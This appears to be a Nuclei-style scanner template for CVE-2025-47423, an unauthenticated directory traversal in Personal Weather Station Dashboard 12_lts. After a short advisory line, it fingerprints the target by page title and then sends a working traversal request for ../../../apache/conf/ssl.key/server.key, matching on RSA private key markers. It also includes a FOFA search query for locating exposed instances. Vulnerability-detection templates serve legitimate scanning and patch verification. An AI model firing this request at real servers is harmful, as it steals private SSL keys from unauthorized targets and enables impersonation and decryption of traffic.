Personal Weather Station Dashboard 12_lts allows unauthenticated remote attackers to read arbitrary files via ../ directory traversal in the test parameter to /others/_test.php, as demonstrated by reading the server's private SSL key in cleartext.
PoC代码[已公开]
id: CVE-2025-47423
info:
name: Personal Weather Station Dashboard 12 - Directory Traversal
author: pussycat0x
severity: high
description: |
Personal Weather Station Dashboard 12_lts allows unauthenticated remote attackers to read arbitrary files via ../ directory traversal in the test parameter to /others/_test.php, as demonstrated by reading the server's private SSL key in cleartext.
reference:
- https://github.com/Haluka92/CVE-2025-47423
- https://pwsdashboard.com/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2025-47423
cwe-id: CWE-24
epss-score: 0.01034
epss-percentile: 0.76773
metadata:
fofa-query: title="PWS Dashboard"
max-request: 2
tags: cve,cve2025,lfi,pws,traversal,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "PWS Dashboard</title>"
internal: true
- raw:
- |
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "BEGIN RSA PRIVATE KEY"
- "END RSA PRIVATE KEY"
condition: and
- type: status
status:
- 200
# digest: 490a0046304402203763d03f4008724d5c478b7baabc61584a77c3fb6891dbc1e42dd330c527214602205aada062c9a013692a318380e2d36061308c08244a8a3ea98c4b38f797ff5564:922c64590222798bb761d5b6d8e72950